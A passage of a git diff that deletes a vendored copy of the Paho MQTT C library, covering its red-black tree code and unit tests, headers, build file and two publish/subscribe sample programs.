-	return (aNode == NULL) || (aNode->red == 0);
-}
-
-
-int TreeWalk(Node* curnode, int depth)
-{
-	if (curnode)
-	{
-		int left = TreeWalk(curnode->child[LEFT], depth+1);
-		int right = TreeWalk(curnode->child[RIGHT], depth+1);
-		depth = max(left, right);
-		if (curnode->red)
-		{
-			/*if (isRed(curnode->child[LEFT]) || isRed(curnode->child[RIGHT]))
-			{
-				printf("red/black tree violation %p\n", curnode->content);
-				exit(-99);
-			}*/;
-		}
-	}
-	return depth;
-}
-
-
-int TreeMaxDepth(Tree *aTree)
-{
-	int rc = TreeWalk(aTree->index[0].root, 0);
-	/*if (aTree->root->red)
-	{
-		printf("root node should not be red %p\n", aTree->root->content);
-		exit(-99);
-	}*/
-	return rc;
-}
-
-
-void TreeRotate(Tree* aTree, Node* curnode, int direction, int index)
-{
-	Node* other = curnode->child[!direction];
-
-	curnode->child[!direction] = other->child[direction];
-	if (other->child[direction] != NULL)
-		other->child[direction]->parent = curnode;
-	other->parent = curnode->parent;
-	if (curnode->parent == NULL)
-		aTree->index[index].root = other;
-	else if (curnode == curnode->parent->child[direction])
-		curnode->parent->child[direction] = other;
-	else
-		curnode->parent->child[!direction] = other;
-	other->child[direction] = curnode;
-	curnode->parent = other;
-}
-
-
-Node* TreeBAASub(Tree* aTree, Node* curnode, int which, int index)
-{
-	Node* uncle = curnode->parent->parent->child[which];
-
-	if (isRed(uncle))
-	{
-		curnode->parent->red = uncle->red = 0;
-		curnode = curnode->parent->parent;
-		curnode->red = 1;
-	}
-	else
-	{
-		if (curnode == curnode->parent->child[which])
-		{
-			curnode = curnode->parent;
-			TreeRotate(aTree, curnode, !which, index);
-		}
-		curnode->parent->red = 0;
-		curnode->parent->parent->red = 1;
-		TreeRotate(aTree, curnode->parent->parent, which, index);
-	}
-	return curnode;
-}
-
-
-void TreeBalanceAfterAdd(Tree* aTree, Node* curnode, int index)
-{
-	while (curnode && isRed(curnode->parent) && curnode->parent->parent)
-	{
-		if (curnode->parent == curnode->parent->parent->child[LEFT])
-			curnode = TreeBAASub(aTree, curnode, RIGHT, index);
-		else
-			curnode = TreeBAASub(aTree, curnode, LEFT, index);
-  }
-  aTree->index[index].root->red = 0;
-}
-
-
-/**
- * Add an item to a tree
- * @param aTree the list to which the item is to be added
- * @param content the list item content itself
- * @param size the size of the element
- */
-void* TreeAddByIndex(Tree* aTree, void* content, size_t size, int index)
-{
-	Node* curparent = NULL;
-	Node* curnode = aTree->index[index].root;
-	Node* newel = NULL;
-	int left = 0;
-	int result = 1;
-	void* rc = NULL;
-
-	while (curnode)
-	{
-		result = aTree->index[index].compare(curnode->content, content, 1);
-		left = (result > 0);
-		if (result == 0)
-			break;
-		else
-		{
-			curparent = curnode;
-			curnode = curnode->child[left];
-		}
-	}
-	
-	if (result == 0)
-	{
-		if (aTree->allow_duplicates)
-			exit(-99);
-		{
-			newel = curnode;
-			rc = newel->content;
-			if (index == 0)
-				aTree->size += (size - curnode->size);
-		}
-	}
-	else
-	{
-		#if defined(UNIT_TESTS)
-			newel = malloc(sizeof(Node));
-		#else
-			newel = (aTree->heap_tracking) ? mymalloc(__FILE__, __LINE__, sizeof(Node)) : malloc(sizeof(Node));
-		#endif
-		memset(newel, '\0', sizeof(Node));
-		if (curparent)
-			curparent->child[left] = newel;
-		else
-			aTree->index[index].root = newel;
-		newel->parent = curparent;
-		newel->red = 1;
-		if (index == 0)
-		{
-			++(aTree->count);
-			aTree->size += size;
-		}
-	}
-	newel->content = content;
-	newel->size = size;
-	TreeBalanceAfterAdd(aTree, newel, index);
-	return rc;
-}
-
-
-void* TreeAdd(Tree* aTree, void* content, size_t size)
-{
-	void* rc = NULL;
-	int i;
-
-	for (i = 0; i < aTree->indexes; ++i)
-		rc = TreeAddByIndex(aTree, content, size, i);
-
-	return rc;
-}
-
-
-Node* TreeFindIndex1(Tree* aTree, void* key, int index, int value)
-{
-	int result = 0;
-	Node* curnode = aTree->index[index].root;
-
-	while (curnode)
-	{
-		result = aTree->index[index].compare(curnode->content, key, value);
-		if (result == 0)
-			break;
-		else
-			curnode = curnode->child[result > 0];
-	}
-	return curnode;
-}
-
-
-Node* TreeFindIndex(Tree* aTree, void* key, int index)
-{
-	return TreeFindIndex1(aTree, key, index, 0);
-}
-
-
-Node* TreeFindContentIndex(Tree* aTree, void* key, int index)
-{
-	return TreeFindIndex1(aTree, key, index, 1);
-}
-
-
-Node* TreeFind(Tree* aTree, void* key)
-{
-	return TreeFindIndex(aTree, key, 0);
-}
-
-
-Node* TreeMinimum(Node* curnode)
-{
-	if (curnode)
-		while (curnode->child[LEFT])
-			curnode = curnode->child[LEFT];
-	return curnode;
-}
-
-
-Node* TreeSuccessor(Node* curnode)
-{
-	if (curnode->child[RIGHT])
-		curnode = TreeMinimum(curnode->child[RIGHT]);
-	else
-	{
-		Node* curparent = curnode->parent;
-		while (curparent && curnode == curparent->child[RIGHT])
-		{
-			curnode = curparent;
-			curparent = curparent->parent;
-		}
-		curnode = curparent;
-	}
-	return curnode;
-}
-
-
-Node* TreeNextElementIndex(Tree* aTree, Node* curnode, int index)
-{
-	if (curnode == NULL)
-		curnode = TreeMinimum(aTree->index[index].root);
-	else
-		curnode = TreeSuccessor(curnode);
-	return curnode;
-}
-
-
-Node* TreeNextElement(Tree* aTree, Node* curnode)
-{
-	return TreeNextElementIndex(aTree, curnode, 0);
-}
-
-
-Node* TreeBARSub(Tree* aTree, Node* curnode, int which, int index)
-{
-	Node* sibling = curnode->parent->child[which];
-
-	if (isRed(sibling))
-	{
-		sibling->red = 0;
-		curnode->parent->red = 1;
-		TreeRotate(aTree, curnode->parent, !which, index);
-		sibling = curnode->parent->child[which];
-	}
-	if (!sibling)
-		curnode = curnode->parent;
-	else if (isBlack(sibling->child[!which]) && isBlack(sibling->child[which]))
-	{
-		sibling->red = 1;
-		curnode = curnode->parent;
-	}
-	else
-	{
-		if (isBlack(sibling->child[which]))
-		{
-			sibling->child[!which]->red = 0;
-			sibling->red = 1;
-			TreeRotate(aTree, sibling, which, index);
-			sibling = curnode->parent->child[which];
-		}
-		sibling->red = curnode->parent->red;
-		curnode->parent->red = 0;
-		sibling->child[which]->red = 0;
-		TreeRotate(aTree, curnode->parent, !which, index);
-		curnode = aTree->index[index].root;
-	}
-	return curnode;
-}
-
-
-void TreeBalanceAfterRemove(Tree* aTree, Node* curnode, int index)
-{
-	while (curnode != aTree->index[index].root && isBlack(curnode))
-	{
-		/* curnode->content == NULL must equal curnode == NULL */
-		if (((curnode->content) ? curnode : NULL) == curnode->parent->child[LEFT])
-			curnode = TreeBARSub(aTree, curnode, RIGHT, index);
-		else
-			curnode = TreeBARSub(aTree, curnode, LEFT, index);
-    }
-	curnode->red = 0;
-}
-
-
-/**
- * Remove an item from a tree
- * @param aTree the list to which the item is to be added
- * @param curnode the list item content itself
- */
-void* TreeRemoveNodeIndex(Tree* aTree, Node* curnode, int index)
-{
-	Node* redundant = curnode;
-	Node* curchild = NULL;
-	size_t size = curnode->size;
-	void* content = curnode->content;
-
-	/* if the node to remove has 0 or 1 children, it can be removed without involving another node */
-	if (curnode->child[LEFT] && curnode->child[RIGHT]) /* 2 children */
-		redundant = TreeSuccessor(curnode); 	/* now redundant must have at most one child */
-
-	curchild = redundant->child[(redundant->child[LEFT] != NULL) ? LEFT : RIGHT];
-	if (curchild) /* we could have no children at all */
-		curchild->parent = redundant->parent;
-
-	if (redundant->parent == NULL)
-		aTree->index[index].root = curchild;
-	else
-	{
-		if (redundant == redundant->parent->child[LEFT])
-			redundant->parent->child[LEFT] = curchild;
-		else
-			redundant->parent->child[RIGHT] = curchild;
-	}
-
-	if (redundant != curnode)
-	{
-		curnode->content = redundant->content;
-		curnode->size = redundant->size;
-	}
-
-	if (isBlack(redundant))
-	{
-		if (curchild == NULL)
-		{
-			if (redundant->parent)
-			{
-				Node temp;
-				memset(&temp, '\0', sizeof(Node));
-				temp.parent = (redundant) ? redundant->parent : NULL;
-				temp.red = 0;
-				TreeBalanceAfterRemove(aTree, &temp, index);
-			}
-		}
-		else
-			TreeBalanceAfterRemove(aTree, curchild, index);
-	}
-
-#if defined(UNIT_TESTS)
-	free(redundant);
-#else
-	(aTree->heap_tracking) ? myfree(__FILE__, __LINE__, redundant) : free(redundant);
-#endif
-	if (index == 0)
-	{
-		aTree->size -= size;
-		--(aTree->count);
-	}
-	return content;
-}
-
-
-/**
- * Remove an item from a tree
- * @param aTree the list to which the item is to be added
- * @param curnode the list item content itself
- */
-void* TreeRemoveIndex(Tree* aTree, void* content, int index)
-{
-	Node* curnode = TreeFindContentIndex(aTree, content, index);
-
-	if (curnode == NULL)
-		return NULL;
-
-	return TreeRemoveNodeIndex(aTree, curnode, index);
-}
-
-
-void* TreeRemove(Tree* aTree, void* content)
-{
-	int i;
-	void* rc = NULL;
-
-	for (i = 0; i < aTree->indexes; ++i)
-		rc = TreeRemoveIndex(aTree, content, i);
-
-	return rc;
-}
-
-
-void* TreeRemoveKeyIndex(Tree* aTree, void* key, int index)
-{
-	Node* curnode = TreeFindIndex(aTree, key, index);
-	void* content = NULL;
-	int i;
-
-	if (curnode == NULL)
-		return NULL;
-
-	content = TreeRemoveNodeIndex(aTree, curnode, index);
-	for (i = 0; i < aTree->indexes; ++i)
-	{
-		if (i != index)
-			content = TreeRemoveIndex(aTree, content, i);
-	}
-	return content;
-}
-
-
-void* TreeRemoveKey(Tree* aTree, void* key)
-{
-	return TreeRemoveKeyIndex(aTree, key, 0);
-}
-
-
-int TreeIntCompare(void* a, void* b, int content)
-{
-	int i = *((int*)a);
-	int j = *((int*)b);
-
-	/* printf("comparing %d %d\n", *((int*)a), *((int*)b)); */
-	return (i > j) ? -1 : (i == j) ? 0 : 1;
-}
-
-
-int TreePtrCompare(void* a, void* b, int content)
-{
-	return (a > b) ? -1 : (a == b) ? 0 : 1;
-}
-
-
-int TreeStringCompare(void* a, void* b, int content)
-{
-	return strcmp((char*)a, (char*)b);
-}
-
-
-#if defined(UNIT_TESTS)
-
-int check(Tree *t)
-{
-	Node* curnode = NULL;
-	int rc = 0;
-
-	curnode = TreeNextElement(t, curnode);
-	while (curnode)
-	{
-		Node* prevnode = curnode;
-
-		curnode = TreeNextElement(t, curnode);
-
-		if (prevnode && curnode && (*(int*)(curnode->content) < *(int*)(prevnode->content)))
-		{
-			printf("out of order %d < %d\n", *(int*)(curnode->content), *(int*)(prevnode->content));
-			rc = 99;
-		}
-	}
-	return rc;
-}
-
-
-int traverse(Tree *t, int lookfor)
-{
-	Node* curnode = NULL;
-	int rc = 0;
-
-	printf("Traversing\n");
-	curnode = TreeNextElement(t, curnode);
-	/* printf("content int %d\n", *(int*)(curnode->content)); */
-	while (curnode)
-	{
-		Node* prevnode = curnode;
-
-		curnode = TreeNextElement(t, curnode);
-		/* if (curnode)
-			printf("content int %d\n", *(int*)(curnode->content)); */
-		if (prevnode && curnode && (*(int*)(curnode->content) < *(int*)(prevnode->content)))
-		{
-			printf("out of order %d < %d\n", *(int*)(curnode->content), *(int*)(prevnode->content));
-		}
-		if (curnode && (lookfor == *(int*)(curnode->content)))
-			printf("missing item %d actually found\n", lookfor);
-	}
-	printf("End traverse %d\n", rc);
-	return rc;
-}
-
-
-int test(int limit)
-{
-	int i, *ip, *todelete;
-	Node* current = NULL;
-	Tree* t = TreeInitialize(TreeIntCompare);
-	int rc = 0;
-
-	printf("Tree initialized\n");
-
-	srand(time(NULL));
-
-	ip = malloc(sizeof(int));
-	*ip = 2;
-	TreeAdd(t, (void*)ip, sizeof(int));
-
-	check(t);
-
-	i = 2;
-	void* result = TreeRemove(t, (void*)&i);
-	if (result)
-		free(result);
-
-	int actual[limit];
-	for (i = 0; i < limit; i++)
-	{
-		void* replaced = NULL;
-
-		ip = malloc(sizeof(int));
-		*ip = rand();
-		replaced = TreeAdd(t, (void*)ip, sizeof(int));
-		if (replaced) /* duplicate */
-		{
-			free(replaced);
-			actual[i] = -1;
-		}
-		else
-			actual[i] = *ip;
-		if (i==5)
-			todelete = ip;
-		printf("Tree element added %d\n",  *ip);
-		if (1 % 1000 == 0)
-		{
-			rc = check(t);
-			printf("%d elements, check result %d\n", i+1, rc);
-			if (rc != 0)
-				return 88;
-		}
-	}
-
-	check(t);
-
-	for (i = 0; i < limit; i++)
-	{
-		int parm = actual[i];
-
-		if (parm == -1)
-			continue;
-
-		Node* found = TreeFind(t, (void*)&parm);
-		if (found)
-			printf("Tree find %d %d\n", parm, *(int*)(found->content));
-		else
-		{
-			printf("%d not found\n", parm);
-			traverse(t, parm);
-			return -2;
-		}
-	}
-
-	check(t);
-
-	for (i = limit -1; i >= 0; i--)
-	{
-		int parm = actual[i];
-		void *found;
-
-		if (parm == -1) /* skip duplicate */
-			continue;
-
-		found = TreeRemove(t, (void*)&parm);
-		if (found)
-		{
-			printf("%d Tree remove %d %d\n", i, parm, *(int*)(found));
-			free(found);
-		}
-		else
-		{
-			int count = 0;
-			printf("%d %d not found\n", i, parm);
-			traverse(t, parm);
-			for (i = 0; i < limit; i++)
-				if (actual[i] == parm)
-					++count;
-			printf("%d occurs %d times\n", parm, count);
-			return -2;
-		}
-		if (i % 1000 == 0)
-		{
-			rc = check(t);
-			printf("%d elements, check result %d\n", i+1, rc);
-			if (rc != 0)
-				return 88;
-		}
-	}
-	printf("finished\n");
-	return 0;
-}
-
-int main(int argc, char *argv[])
-{
-	int rc = 0;
-
-	while (rc == 0)
-		rc = test(999999);
-}
-
-#endif
-
-
-
-
-
diff --git a/thirdparty/paho.mqtt.c/src/Tree.h b/thirdparty/paho.mqtt.c/src/Tree.h
deleted file mode 100644
index bbbd014..0000000
--- a/thirdparty/paho.mqtt.c/src/Tree.h
+++ /dev/null
@@ -1,115 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial implementation and documentation
- *******************************************************************************/
-
-
-#if !defined(TREE_H)
-#define TREE_H
-
-#include <stdlib.h> /* for size_t definition */
-
-/*BE
-defm defTree(T) // macro to define a tree
-
-def T concat Node
-{
-	n32 ptr T concat Node "parent"
-	n32 ptr T concat Node "left"
-	n32 ptr T concat Node "right"
-	n32 ptr T id2str(T)
-	n32 suppress "size"
-}
-
-
-def T concat Tree
-{
-	struct
-	{
-		n32 ptr T concat Node suppress "root"
-		n32 ptr DATA suppress "compare"
-	} 
-	struct
-	{
-		n32 ptr T concat Node suppress "root"
-		n32 ptr DATA suppress "compare"
-	} 
-	n32 dec "count"
-	n32 dec suppress "size"
-}
-
-endm
-
-defTree(INT)
-defTree(STRING)
-defTree(TMP)
-
-BE*/
-
-/**
- * Structure to hold all data for one list element
- */
-typedef struct NodeStruct
-{
-	struct NodeStruct *parent,   /**< pointer to parent tree node, in case we need it */
-					  *child[2]; /**< pointers to child tree nodes 0 = left, 1 = right */
-	void* content;				 /**< pointer to element content */
-	size_t size;					 /**< size of content */
-	unsigned int red : 1;
-} Node;
-
-
-/**
- * Structure to hold all data for one tree
- */
-typedef struct
-{
-	struct
-	{
-		Node *root;	/**< root node pointer */
-		int (*compare)(void*, void*, int); /**< comparison function */
-	} index[2];
-	int indexes,  /**< no of indexes into tree */
-		count;    /**< no of items */
-	size_t size;  /**< heap storage used */
-	unsigned int heap_tracking : 1; /**< switch on heap tracking for this tree? */
-	unsigned int allow_duplicates : 1; /**< switch to allow duplicate entries */
-} Tree;
-
-
-Tree* TreeInitialize(int(*compare)(void*, void*, int));
-void TreeInitializeNoMalloc(Tree* aTree, int(*compare)(void*, void*, int));
-void TreeAddIndex(Tree* aTree, int(*compare)(void*, void*, int));
-
-void* TreeAdd(Tree* aTree, void* content, size_t size);
-
-void* TreeRemove(Tree* aTree, void* content);
-
-void* TreeRemoveKey(Tree* aTree, void* key);
-void* TreeRemoveKeyIndex(Tree* aTree, void* key, int index);
-
-void* TreeRemoveNodeIndex(Tree* aTree, Node* aNode, int index);
-
-void TreeFree(Tree* aTree);
-
-Node* TreeFind(Tree* aTree, void* key);
-Node* TreeFindIndex(Tree* aTree, void* key, int index);
-
-Node* TreeNextElement(Tree* aTree, Node* curnode);
-
-int TreeIntCompare(void* a, void* b, int);
-int TreePtrCompare(void* a, void* b, int);
-int TreeStringCompare(void* a, void* b, int);
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/VersionInfo.h.in b/thirdparty/paho.mqtt.c/src/VersionInfo.h.in
deleted file mode 100644
index 5b91bf3..0000000
--- a/thirdparty/paho.mqtt.c/src/VersionInfo.h.in
+++ /dev/null
@@ -1,7 +0,0 @@
-#ifndef VERSIONINFO_H
-#define VERSIONINFO_H
-
-#define BUILD_TIMESTAMP "@BUILD_TIMESTAMP@"
-#define CLIENT_VERSION  "@CLIENT_VERSION@"
-
-#endif /* VERSIONINFO_H */
diff --git a/thirdparty/paho.mqtt.c/src/samples/CMakeLists.txt b/thirdparty/paho.mqtt.c/src/samples/CMakeLists.txt
deleted file mode 100644
index 79ea886..0000000
--- a/thirdparty/paho.mqtt.c/src/samples/CMakeLists.txt
+++ /dev/null
@@ -1,65 +0,0 @@
-#*******************************************************************************
-#  Copyright (c) 2015, 2017 logi.cals GmbH and others
-#
-#  All rights reserved. This program and the accompanying materials
-#  are made available under the terms of the Eclipse Public License v1.0
-#  and Eclipse Distribution License v1.0 which accompany this distribution.
-#
-#  The Eclipse Public License is available at
-#     http://www.eclipse.org/legal/epl-v10.html
-#  and the Eclipse Distribution License is available at
-#    http://www.eclipse.org/org/documents/edl-v10.php.
-#
-#  Contributors:
-#     Rainer Poisel - initial version
-#     Ian Craggs - update sample names
-#*******************************************************************************/
-
-# Note: on OS X you should install XCode and the associated command-line tools
-
-## compilation/linkage settings
-INCLUDE_DIRECTORIES(
-    .
-    ${CMAKE_SOURCE_DIR}/src
-    ${CMAKE_BINARY_DIR}
-    )
-
-IF (WIN32)
-  	ADD_DEFINITIONS(/DCMAKE_BUILD /D_CRT_SECURE_NO_DEPRECATE)
-ENDIF()
-
-# sample files c
-ADD_EXECUTABLE(paho_c_pub paho_c_pub.c)
-ADD_EXECUTABLE(paho_c_sub paho_c_sub.c)
-ADD_EXECUTABLE(paho_cs_pub paho_cs_pub.c)
-ADD_EXECUTABLE(paho_cs_sub paho_cs_sub.c)
-
-TARGET_LINK_LIBRARIES(paho_c_pub paho-mqtt3a)
-TARGET_LINK_LIBRARIES(paho_c_sub paho-mqtt3a)
-TARGET_LINK_LIBRARIES(paho_cs_pub paho-mqtt3c)
-TARGET_LINK_LIBRARIES(paho_cs_sub paho-mqtt3c)
-
-ADD_EXECUTABLE(MQTTAsync_subscribe MQTTAsync_subscribe.c)
-ADD_EXECUTABLE(MQTTAsync_publish MQTTAsync_publish.c)
-ADD_EXECUTABLE(MQTTClient_subscribe MQTTClient_subscribe.c)
-ADD_EXECUTABLE(MQTTClient_publish MQTTClient_publish.c)
-ADD_EXECUTABLE(MQTTClient_publish_async MQTTClient_publish_async.c)
-
-TARGET_LINK_LIBRARIES(MQTTAsync_subscribe paho-mqtt3a)
-TARGET_LINK_LIBRARIES(MQTTAsync_publish paho-mqtt3a)
-TARGET_LINK_LIBRARIES(MQTTClient_subscribe paho-mqtt3c)
-TARGET_LINK_LIBRARIES(MQTTClient_publish paho-mqtt3c)
-TARGET_LINK_LIBRARIES(MQTTClient_publish_async paho-mqtt3c)
-
-INSTALL(TARGETS paho_c_sub
-                paho_c_pub
-                paho_cs_sub
-                paho_cs_pub
-                MQTTAsync_subscribe
-                MQTTAsync_publish
-                MQTTClient_subscribe
-                MQTTClient_publish
-                MQTTClient_publish_async
-
-    RUNTIME DESTINATION ${CMAKE_INSTALL_BINDIR}
-    LIBRARY DESTINATION ${CMAKE_INSTALL_LIBDIR})
diff --git a/thirdparty/paho.mqtt.c/src/samples/MQTTAsync_publish.c b/thirdparty/paho.mqtt.c/src/samples/MQTTAsync_publish.c
deleted file mode 100644
index a524940..0000000
--- a/thirdparty/paho.mqtt.c/src/samples/MQTTAsync_publish.c
+++ /dev/null
@@ -1,154 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2012, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *   http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial contribution
- *******************************************************************************/
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include "MQTTAsync.h"
-
-#if !defined(WIN32)
-#include <unistd.h>
-#else
-#include <windows.h>
-#endif
-
-#include <OsWrapper.h>
-
-#define ADDRESS     "tcp://m2m.eclipse.org:1883"
-#define CLIENTID    "ExampleClientPub"
-#define TOPIC       "MQTT Examples"
-#define PAYLOAD     "Hello World!"
-#define QOS         1
-#define TIMEOUT     10000L
-
-volatile MQTTAsync_token deliveredtoken;
-
-int finished = 0;
-
-void connlost(void *context, char *cause)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-	int rc;
-
-	printf("\nConnection lost\n");
-	printf("     cause: %s\n", cause);
-
-	printf("Reconnecting\n");
-	conn_opts.keepAliveInterval = 20;
-	conn_opts.cleansession = 1;
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
- 		finished = 1;
-	}
-}
-
-
-void onDisconnect(void* context, MQTTAsync_successData* response)
-{
-	printf("Successful disconnection\n");
-	finished = 1;
-}
-
-
-void onSend(void* context, MQTTAsync_successData* response)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_disconnectOptions opts = MQTTAsync_disconnectOptions_initializer;
-	int rc;
-
-	printf("Message with token value %d delivery confirmed\n", response->token);
-
-	opts.onSuccess = onDisconnect;
-	opts.context = client;
-
-	if ((rc = MQTTAsync_disconnect(client, &opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start sendMessage, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-}
-
-
-void onConnectFailure(void* context, MQTTAsync_failureData* response)
-{
-	printf("Connect failed, rc %d\n", response ? response->code : 0);
-	finished = 1;
-}
-
-
-void onConnect(void* context, MQTTAsync_successData* response)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_responseOptions opts = MQTTAsync_responseOptions_initializer;
-	MQTTAsync_message pubmsg = MQTTAsync_message_initializer;
-	int rc;
-
-	printf("Successful connection\n");
-	
-	opts.onSuccess = onSend;
-	opts.context = client;
-
-	pubmsg.payload = PAYLOAD;
-	pubmsg.payloadlen = strlen(PAYLOAD);
-	pubmsg.qos = QOS;
-	pubmsg.retained = 0;
-	deliveredtoken = 0;
-
-	if ((rc = MQTTAsync_sendMessage(client, TOPIC, &pubmsg, &opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start sendMessage, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-}
-
-
-int main(int argc, char* argv[])
-{
-	MQTTAsync client;
-	MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-	int rc;
-
-	MQTTAsync_create(&client, ADDRESS, CLIENTID, MQTTCLIENT_PERSISTENCE_NONE, NULL);
-
-	MQTTAsync_setCallbacks(client, NULL, connlost, NULL, NULL);
-
-	conn_opts.keepAliveInterval = 20;
-	conn_opts.cleansession = 1;
-	conn_opts.onSuccess = onConnect;
-	conn_opts.onFailure = onConnectFailure;
-	conn_opts.context = client;
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-
-	printf("Waiting for publication of %s\n"
-         "on topic %s for client with ClientID: %s\n",
-         PAYLOAD, TOPIC, CLIENTID);
-	while (!finished)
-		#if defined(WIN32)
-			Sleep(100);
-		#else
-			usleep(10000L);
-		#endif
-
-	MQTTAsync_destroy(&client);
- 	return rc;
-}
-  
diff --git a/thirdparty/paho.mqtt.c/src/samples/MQTTAsync_subscribe.c b/thirdparty/paho.mqtt.c/src/samples/MQTTAsync_subscribe.c
deleted file mode 100644
index d0a01f8..0000000
--- a/thirdparty/paho.mqtt.c/src/samples/MQTTAsync_subscribe.c
+++ /dev/null
@@ -1,190 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2012, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *   http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial contribution
- *******************************************************************************/
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include "MQTTAsync.h"
-
-#if !defined(WIN32)
-#include <unistd.h>
-#else
-#include <windows.h>
-#endif
-
-#include <OsWrapper.h>
-
-#define ADDRESS     "tcp://localhost:1883"
-#define CLIENTID    "ExampleClientSub"
-#define TOPIC       "MQTT Examples"
-#define PAYLOAD     "Hello World!"
-#define QOS         1
-#define TIMEOUT     10000L
-
-volatile MQTTAsync_token deliveredtoken;
-
-int disc_finished = 0;
-int subscribed = 0;
-int finished = 0;
-
-void connlost(void *context, char *cause)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-	int rc;
-
-	printf("\nConnection lost\n");
-	if (cause)
-		printf("     cause: %s\n", cause);
-
-	printf("Reconnecting\n");
-	conn_opts.keepAliveInterval = 20;
-	conn_opts.cleansession = 1;
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
-		finished = 1;
-	}
-}
-
-
-int msgarrvd(void *context, char *topicName, int topicLen, MQTTAsync_message *message)
-{
-    int i;
-    char* payloadptr;
-
-    printf("Message arrived\n");
-    printf("     topic: %s\n", topicName);
-    printf("   message: ");
-
-    payloadptr = message->payload;
-    for(i=0; i<message->payloadlen; i++)
-    {
-        putchar(*payloadptr++);
-    }
-    putchar('\n');
-    MQTTAsync_freeMessage(&message);
-    MQTTAsync_free(topicName);
-    return 1;
-}
-
-
-void onDisconnect(void* context, MQTTAsync_successData* response)
-{
-	printf("Successful disconnection\n");
-	disc_finished = 1;
-}
-
-
-void onSubscribe(void* context, MQTTAsync_successData* response)
-{
-	printf("Subscribe succeeded\n");
-	subscribed = 1;
-}
-
-void onSubscribeFailure(void* context, MQTTAsync_failureData* response)
-{
-	printf("Subscribe failed, rc %d\n", response ? response->code : 0);
-	finished = 1;
-}
-
-
-void onConnectFailure(void* context, MQTTAsync_failureData* response)
-{
-	printf("Connect failed, rc %d\n", response ? response->code : 0);
-	finished = 1;
-}
-
-
-void onConnect(void* context, MQTTAsync_successData* response)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_responseOptions opts = MQTTAsync_responseOptions_initializer;
-	int rc;
-
-	printf("Successful connection\n");
-
-	printf("Subscribing to topic %s\nfor client %s using QoS%d\n\n"
-           "Press Q<Enter> to quit\n\n", TOPIC, CLIENTID, QOS);
-	opts.onSuccess = onSubscribe;
-	opts.onFailure = onSubscribeFailure;
-	opts.context = client;
-
-	deliveredtoken = 0;
-
-	if ((rc = MQTTAsync_subscribe(client, TOPIC, QOS, &opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start subscribe, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-}
-
-
-int main(int argc, char* argv[])
-{
-	MQTTAsync client;
-	MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-	MQTTAsync_disconnectOptions disc_opts = MQTTAsync_disconnectOptions_initializer;
-	int rc;
-	int ch;
-
-	MQTTAsync_create(&client, ADDRESS, CLIENTID, MQTTCLIENT_PERSISTENCE_NONE, NULL);
-
-	MQTTAsync_setCallbacks(client, client, connlost, msgarrvd, NULL);
-
-	conn_opts.keepAliveInterval = 20;
-	conn_opts.cleansession = 1;
-	conn_opts.onSuccess = onConnect;
-	conn_opts.onFailure = onConnectFailure;
-	conn_opts.context = client;
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-
-	while	(!subscribed)
-		#if defined(WIN32)
-			Sleep(100);
-		#else
-			usleep(10000L);
-		#endif
-
-	if (finished)
-		goto exit;
-
-	do 
-	{
-		ch = getchar();
-	} while (ch!='Q' && ch != 'q');
-
-	disc_opts.onSuccess = onDisconnect;
-	if ((rc = MQTTAsync_disconnect(client, &disc_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start disconnect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
- 	while	(!disc_finished)
-		#if defined(WIN32)
-			Sleep(100);
-		#else
-			usleep(10000L);
-		#endif
-
-exit:
-	MQTTAsync_destroy(&client);
- 	return rc;
-}
